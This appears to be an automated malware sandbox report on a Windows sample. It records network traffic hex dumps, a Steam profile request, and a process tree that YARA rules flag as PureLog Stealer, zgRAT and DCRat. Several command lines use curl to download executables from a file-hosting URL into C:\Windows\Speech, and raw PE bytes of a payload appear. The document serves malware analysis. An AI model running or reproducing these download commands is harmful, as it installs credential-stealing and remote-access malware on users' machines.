2024-09-30 16:19:12 UTC	547	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 aa 57 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 9c 05 00 00 08 00 00 00 00 00 00 be bb 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELWf @ `
2024-09-30 16:19:12 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f 39 6d 95 5b 1c e7 2e 7b bf 94 a8 e9 8e 56 e9 5f 41 b3 ac 5f e4 ac 13 58 c3 bf b8 5b 6d 93 27 cd e6 23 51 f2 b8 9f 1c 93 a1 8d dd 2e 5b ca d0 8d 2b 48 f0 3c fc 85 66 5a f5 10 7c e6 ca aa 13 03 07 6d 26 d3 2e 1d a0 19 bf 79 aa bb 3b 4b 52 05 a6 94 af 37 a1 e7 53 c2 c0 6b 93 6d 3f f3 b7 38 08 a7 49 44 26 de 21 30 25 4e 21 5c 01 5c 06 cb 4c 5e 1e 1b cd 88 30 5c 11 b1 df cf 02 6a 7c a1 4d 85 ac fa af 1f 8a 8c 0f eb 4d ab 3b db 2a 86 71 ff b7 55 4f fa e8 21 27 b3 f3 25 2e 20 64 ba 45 ee 75 97 cb 8a 83 ea ee d2 51 2d 77 d4 a5 24 49 01 be e9 58 8f df d0 30 64 10 b5 f9 06 ea 88 a4 eb 9f 66 bd 24 7c 28 09 67 45 a9 4e 10 89 8c 33 Data Ascii: 9m[.{V_A_X[m'#Q.[+H<fZ\|m&.y;KR7Skm?8ID&!0%N!\\L^0\j\|MM;*qUO!'%. dEuQ-w$IX0df$\|(gEN3
2024-09-30 16:19:12 UTC	1369	IN	Data Raw: bc d3 bf ab bd d7 a6 cf c2 32 1f a5 ff 5b 35 43 95 d0 93 a5 1d a0 c3 58 22 2c a4 8d eb c5 fb 07 a9 8c df 5f f7 3a 6b 24 02 f0 81 4a 34 0a bb 38 51 98 33 fa 65 0b 92 ff ae 2c c0 7c 6b 10 c6 53 66 e5 bd 95 5e 9e e7 4f 4d 77 1b 9f e6 d6 81 bd fd d1 7a ea 2d 8a f4 43 c6 c2 51 d2 6c 6c fa 8a f1 c2 1a c5 e5 40 96 c2 58 1b 78 42 71 52 38 56 21 63 6c c4 84 06 d5 0a 09 01 80 fb 8c ee 9d 40 14 bc d6 47 4b a8 ca c3 14 80 32 95 6c 0e f9 bf 9d 42 e4 df 07 88 e3 17 54 d4 eb 1f 8d fc fb 25 b2 aa 14 da ed 36 3e 13 c6 03 cb 68 dc 6b 69 86 6f bb b7 df 52 21 f8 a0 d8 79 dd f8 77 d5 8b 01 5a c2 cc 90 80 f0 bc b5 7b bc 30 3c bc 54 2c bc 22 03 9e 29 a1 f5 4a d4 54 08 f4 e9 58 f9 89 ca 72 b3 26 56 3d 3b 0d 3d e4 13 b4 4f ff ec ca de ec e9 38 17 7b be 01 fc fb 2f 3e e0 25 b2 a7 Data Ascii: 2[5CX",_:k$J48Q3e,\|kSf^OMwz-CQll@XxBqR8V!cl@GK2lBT%6>hkioR!ywZ{0<T,")JTXr&V=;=O8{/>%
2024-09-30 16:19:12 UTC	1369	IN	Data Raw: 36 37 3f d2 7d 27 73 de f9 d8 b9 97 ee d9 92 7d 3e c4 20 3a b4 ef 3f 15 dd f7 b7 8f cf 6d 91 51 45 42 e7 d4 5f d8 c4 0c 7c e9 fb f3 db 4f bb fe 99 be ed ae 68 51 b5 c1 77 4f e5 0e 85 dd 21 aa 19 5e 53 de 6a d4 6d 55 c1 54 09 09 8f 24 26 51 79 d7 75 7f db c2 b9 80 3c a9 a0 a9 a2 70 ec e2 35 36 cd 8d 62 94 1a 29 c5 91 4f 66 f5 51 d8 38 d2 15 c0 e2 7d 85 38 ec 10 4f 7e 17 29 56 5c b7 7f f2 05 74 78 ab 7d d9 d6 08 40 c1 10 bf c9 f0 cd 7f e3 91 29 3d 26 4c 52 4f b5 56 07 91 05 b8 a8 5f 80 bc 75 88 1b 80 26 17 21 df e3 fb 96 1c 59 3a 69 39 0b f3 ea 2a 51 28 ff 5c b0 a9 b3 bb de 18 a9 c7 56 89 d3 9b aa a3 e4 50 b4 ba 0f 90 bc 42 ac be b7 86 c2 b5 be 9c 76 11 87 f6 46 d2 59 28 4c a3 78 5f 77 ab e6 ae e2 b3 9d ee 08 d2 e1 90 44 7b e6 a2 ba 8a 00 91 c5 71 c7 ca 5d Data Ascii: 67?}'s}> :?mQEB_\|OhQwO!^SjmUT$&Qyu<p56b)OfQ8}8O~)V\tx}@)=&LROV_u&!Y:i9*Q(\VPBvFY(Lx_wD{q]
2024-09-30 16:19:12 UTC	1369	IN	Data Raw: 61 48 51 77 b6 a9 db 13 c2 e3 5f 0f 28 43 ce 78 12 84 32 75 5d 67 61 3c b1 30 99 eb 62 5f f5 ce 44 19 f7 9e 6d 03 72 57 32 55 f6 bb 09 c5 f5 dc 74 09 cb 53 22 20 0b 38 f6 45 fd 98 35 71 18 c7 ae 85 5a b2 a3 9d ca e1 74 b9 2c 38 46 12 80 7a 12 69 58 c8 70 ba bc 0a 2d 1e 45 36 ce d2 8b 70 53 7e 20 ec 34 31 78 04 fe 8a 18 6e f8 ac b8 89 ff 37 50 e4 bc c6 ae 3b bd e1 8b 5f f2 cf 48 37 03 e3 5e b0 99 0a fc f1 0c c6 71 b8 61 bc 40 30 a8 32 48 80 c9 79 28 a8 e6 23 e6 ce 51 a8 4d b8 43 82 cf ec 82 6b 2f fd 16 b1 42 db 64 5d 91 b4 8d 5d 02 a0 54 a9 04 cd 1b 18 09 86 07 0b d8 79 34 0d ea 9e 67 aa 2f 84 48 3c c7 e3 4e ff fa 02 89 6c a1 f2 e5 35 78 62 2d f2 74 05 c4 6c 2e e0 39 5c c0 e1 b1 e8 92 43 fe ba 0f 24 99 79 3f 57 dd 01 c3 7d 15 e4 a1 c8 40 5d 17 e3 f9 da 2b Data Ascii: aHQw_(Cx2u]ga<0b_DmrW2UtS" 8E5qZt,8FziXp-E6pS~ 41xn7P;_H7^qa@02Hy(#QMCk/Bd]]Ty4g/H<Nl5xb-tl.9\C$y?W}@]+
2024-09-30 16:19:12 UTC	1369	IN	Data Raw: 40 23 8b 17 c6 46 95 ba 47 9a 42 3b c2 38 5b 0d d5 23 a7 ed 53 cd ad 7f 5b 54 8e 86 00 b4 96 ee 53 43 ee 85 90 aa 8d 74 38 57 58 fe 24 b8 00 30 95 3c 4e 10 74 29 7a 22 be df d5 50 1e ba 4b bb f7 a6 73 c4 b4 ac 88 37 ec bb 69 8c da c0 5f f9 07 4e 93 37 ca 97 ec d5 ae 44 d1 88 72 e4 a1 8b 09 f6 ef b8 a5 55 60 50 f3 c4 a4 3b 19 c1 57 7b 18 70 8a 80 c6 ed 1f 1f 87 cb fe 9b e9 9b f3 e7 3a 9d 86 36 65 23 04 74 33 a1 ff 0d fc 64 b3 8c a0 cd 4f 3d 12 c7 a5 61 09 85 d7 5b d3 a2 13 08 46 40 ea 3f 82 ff 89 f7 66 30 aa 12 0c cc 8d 86 54 a6 5f 5c f6 53 76 4d ca 8c da 1d eb 63 b9 0e c7 65 a9 78 f1 31 33 40 6a fa 95 8c c9 ad 98 8b e9 e0 27 9d 9e 6e d9 42 d1 ae a6 7b 2e 5b 25 d8 13 d0 ee a3 d3 fe 89 77 fc bd 93 5a bd 72 a9 4e 2a cf 1e 96 85 1b d0 82 ea 04 dc f2 3e 36 15 Data Ascii: @#FGB;8[#S[TSCt8WX$0<Nt)z"PKs7i_N7DrU`P;W{p:6e#t3dO=a[F@?f0T_\SvMcex13@j'nB{.[%wZrN*>6
2024-09-30 16:19:12 UTC	1369	IN	Data Raw: 0e 6c a0 99 eb c9 ae 9b 33 8e da 2c 8f cd 05 db 65 80 ec 7a 7d 93 eb 70 e9 a7 88 2d 10 90 61 90 bb 00 94 84 e5 c7 98 27 c5 0e 75 a6 98 05 03 7a f5 5e 6c d0 54 fc 36 f8 c7 26 ae 1c 53 3a e2 de 31 97 91 67 c6 3c 2f 47 b8 4b 17 9f 70 01 93 92 a1 e6 0f 88 b3 d8 d3 2c 56 d6 fe f3 7a 98 e0 33 39 b4 43 fb a3 e8 11 4c 57 ad 59 86 68 03 88 a4 bd 93 44 5c b9 bb 4b af bb 47 21 96 fe 97 60 1f 98 67 35 89 f1 5c dd b4 65 e3 09 a6 1a a8 d8 5a c5 30 5f 9e 04 6b ec 2f 70 03 1e 33 f8 88 ec 77 97 c3 a4 2e 0e f7 fc 83 18 8b e3 99 37 8b 4a b1 36 d7 23 5a 35 a7 51 cb b8 a9 52 e4 3d c9 05 5e 26 95 e5 c8 39 37 f8 f5 e0 0c 58 cb 23 8c 73 47 b8 f4 fa e6 fb 60 21 11 bd 12 de 17 b3 b8 b6 26 4d d7 80 3c 7e f4 f7 c5 b6 d8 7d a5 6d 14 b7 d8 58 eb 8f 7f f0 29 43 73 5f e3 66 34 b3 7d 6a Data Ascii: l3,ez}p-a'uz^lT6&S:1g</GKp,Vz39CLWYhD\KG!`g5\eZ0_k/p3w.7J6#Z5QR=^&97X#sG`!&M<~}mX)Cs_f4}j
2024-09-30 16:19:12 UTC	1369	IN	Data Raw: 76 07 31 2b 17 37 77 3c 67 d8 fd 78 fb a4 4a 66 99 b7 53 7b ab 06 7e 5a 05 99 c0 73 8c 4e 9a 7f e0 a9 b8 bb 14 a6 a8 5c 1a a0 70 56 77 95 cb 60 ea f7 bd 64 a8 ad ed 88 06 bb 5b 72 ee d7 a1 63 0c c0 b6 e0 94 e1 89 45 44 62 8f 3d a8 94 a1 e7 09 42 7c 41 33 28 c6 58 3d 1d da 3f e7 7b 49 70 e7 35 60 9f 9b 87 44 53 df 66 84 31 6a ee 36 26 46 b0 56 9e c8 fb 80 f2 ca b0 63 9b 0d 09 0b 4e 91 13 12 49 99 55 15 a3 9d 4d 82 75 63 d2 30 d5 c5 09 a7 84 19 fe bc 83 9e e6 4d 65 a2 3f 84 12 43 c6 a8 38 32 73 41 50 39 92 3f 92 ce 36 d4 69 d5 e5 32 cf 30 46 44 1f 74 23 d4 43 b8 34 1d 3f 70 41 e9 7c e1 92 79 a3 55 73 6d 6a 8d 65 7c 11 5c 0e 3c f1 7f 8d bb bb 5f 0b da fd c8 74 09 64 d8 20 c1 d3 24 7d 84 64 34 cd fe 4e 6c af 36 fe 81 2a 0b f1 19 ac 66 a3 ad 8f e9 b1 09 d3 d4 Data Ascii: v1+7w<gxJfS{~ZsN\pVw`d[rcEDb=B\|A3(X=?{Ip5`DSf1j6&FVcNIUMuc0Me?C82sAP9?6i20FDt#C4?pA\|yUsmje\|\<_td $}d4Nl6*f
2024-09-30 16:19:12 UTC	1369	IN	Data Raw: 22 0b b1 b6 50 c9 c6 39 41 c4 21 cd 72 e1 17 34 2f 56 df 2b d7 80 70 53 e2 5f 70 18 8b 55 25 32 1a 39 0b 05 fb 5c 9a 55 a5 3f 8a 3b da 24 81 58 a3 8a ad 79 c7 8c e4 c2 21 9f 3e 1f 46 66 e1 ff 39 d9 33 82 52 a4 b1 4b a6 e1 ea 7a 06 56 3c 2a bb ec 8c d3 3a 65 c9 90 79 ab cf 79 7d b5 8d d9 56 c2 98 b3 54 5a 5a 3d 2c 24 eb 0c 12 47 7a 2a 5c b7 64 e1 ee 3e 76 7b bc eb 66 23 88 d0 2a ef 2f cb 4b 5e 66 5f 47 f4 ba a6 81 78 3a a6 5d 97 0c 3a ff 2e c9 51 e4 b5 d5 3a 7e 3c f1 26 eb ec 98 a2 b4 83 9c 3f 21 20 2e 13 a1 f2 da 4b 3d f4 2c f3 72 e8 eb 50 33 e4 ef 1e 1a 92 bb 48 1c da a3 36 34 b2 eb 90 4e af 06 bc 31 da ea 38 8d 15 d1 85 5d 52 6e 0b 99 9a a1 3c b6 6d 53 3f ad 6f 64 a3 f4 95 fa 0d 9c ab 44 37 03 53 68 f0 8f c3 56 5e 4a 41 81 ff 4b 93 f4 56 6a cd 5c 7e 19 Data Ascii: "P9A!r4/V+pS_pU%29\U?;$Xy!>Ff93RKzV<:eyy}VTZZ=,$Gz\d>v{f#*/K^f_Gx:]:.Q:~<&?! .K=,rP3H64N18]Rn<mS?odD7ShV^JAKVj\~
2024-09-30 16:19:12 UTC	1369	IN	Data Raw: 7b a7 60 72 02 40 88 2f e9 2e bc d8 05 68 d8 da f5 21 9f a7 4c a0 33 85 79 90 91 bd 38 73 36 7d 2a d6 a9 8a 2e 5e 35 6b 60 d7 49 b9 f9 9b 04 ce 38 5b de b3 1c 04 1f 5d e5 f0 2d e8 5c ae ef 28 57 2f 89 1e d5 5b da 3a 3d 16 58 6f 5f 40 af 93 12 92 0b 71 c6 87 b4 b6 88 a7 24 87 22 97 47 9d 38 9d a8 d2 74 8b aa cb c0 ff cc 05 fc 0d 78 25 72 3a 80 32 16 d0 59 2d dd 4e 6f 73 b1 cf 53 6d e5 25 8e 0a 41 5e ff 54 32 e0 3c 2f 7c aa f0 7f c1 4c 7c 5b 9c 08 c1 8c fb 32 7d c4 01 de 63 72 22 44 0a 65 4e bf 18 29 d7 76 bd 76 5f 91 65 48 2a 8b a9 ec 34 e3 6a 6e f5 bf 6d 13 83 9a 24 ef 95 57 53 10 c8 9d ca fb 5f 6b ff b5 07 a8 aa 35 a1 63 95 a4 f3 03 b1 9e 3a 11 54 d2 e6 95 ea 69 d4 4e 53 93 fe e1 e5 52 6a d5 58 f2 90 2a 27 12 cf 54 44 d4 08 b2 ce 94 7c c2 af fd 4b 7b e0 Data Ascii: {`r@/.h!L3y8s6}.^5k`I8[]-\(W/[:=Xo_@q$"G8tx%r:2Y-NosSm%A^T2</\|L\|[2}cr"DeN)vv_eH4jnm$WS_k5c:TiNSRjX*'TD\|K{

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	65264	104.102.49.254	443	1512	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 16:19:15 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-09-30 16:19:16 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Mon, 30 Sep 2024 16:19:16 GMT Content-Length: 25330 Connection: close Set-Cookie: sessionid=b3a5e989a480efb8300c17c0; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-30 16:19:16 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-30 16:19:16 UTC	10816	IN	Data Raw: 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 20 74 69 67 68 74 22 20 68 72 65 66 3d 22 3f 6c 3d 62 75 6c 67 61 72 69 61 6e 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 62 75 6c 67 61 72 69 61 6e 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e d0 91 d1 8a d0 bb d0 b3 d0 b0 d1 80 d1 81 d0 ba d0 b8 20 28 42 75 6c 67 61 72 69 61 6e 29 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 20 74 69 67 68 74 22 20 68 72 65 66 3d 22 3f 6c 3d 63 7a 65 63 68 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 63 7a 65 63 68 27 20 29 3b 20 72 65 74 Data Ascii: ss="popup_menu_item tight" href="?l=bulgarian" onclick="ChangeLanguage( 'bulgarian' ); return false;"> (Bulgarian)</a><a class="popup_menu_item tight" href="?l=czech" onclick="ChangeLanguage( 'czech' ); ret

Target ID:	0
Start time:	12:19:04
Start date:	30/09/2024
Path:	C:\Users\user\Desktop\gh3zRWl4or.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\gh3zRWl4or.exe"
Imagebase:	0x7ff674140000
File size:	637'440 bytes
MD5 hash:	B172FEB05A0515D00442F6EF11B167BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	12:19:04
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	12:19:07
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
Imagebase:	0x7ff722710000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	12:19:07
Start date:	30/09/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
Imagebase:	0x7ff6b9420000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	12:19:10
Start date:	30/09/2024
Path:	C:\Windows\Speech\kdmapper.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Speech\kdmapper.exe"
Imagebase:	0x620000
File size:	2'284'739 bytes
MD5 hash:	C85ABE0E8C3C4D4C5044AEF6422B8218
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000003.1361668958.0000000005244000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000003.1359428900.0000000006A09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security
Antivirus matches:	Detection: 68%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:19:10
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
Imagebase:	0x7ff722710000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:19:10
Start date:	30/09/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	true
Commandline:	curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
Imagebase:	0xfd0000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	12:19:12
Start date:	30/09/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe"
Imagebase:	0xb10000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	12:19:12
Start date:	30/09/2024
Path:	C:\Windows\Speech\physmeme.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Speech\physmeme.exe"
Imagebase:	0x580000
File size:	370'176 bytes
MD5 hash:	D6EDF37D68DA356237AE14270B3C7A1A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 61%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	12:19:12
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:19:13
Start date:	30/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xd50000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	13:56:01
Start date:	30/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	13:56:01
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	13:56:01
Start date:	30/09/2024
Path:	C:\Edge\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Edge/msedge.exe"
Imagebase:	0xb90000
File size:	1'963'008 bytes
MD5 hash:	ABD343DF6FBD7334D617F76F6F050E3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000010.00000000.1521808737.0000000000B92000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.1584842315.0000000013039000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Edge\msedge.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Edge\msedge.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	13:56:04
Start date:	30/09/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.cmdline"
Imagebase:	0x7ff7e2090000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	13:56:04
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	13:56:05
Start date:	30/09/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESC82C.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1C41CCC2AAF942199E65A42A37D1FE2.TMP"
Imagebase:	0x7ff67ffc0000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	13:56:05
Start date:	30/09/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
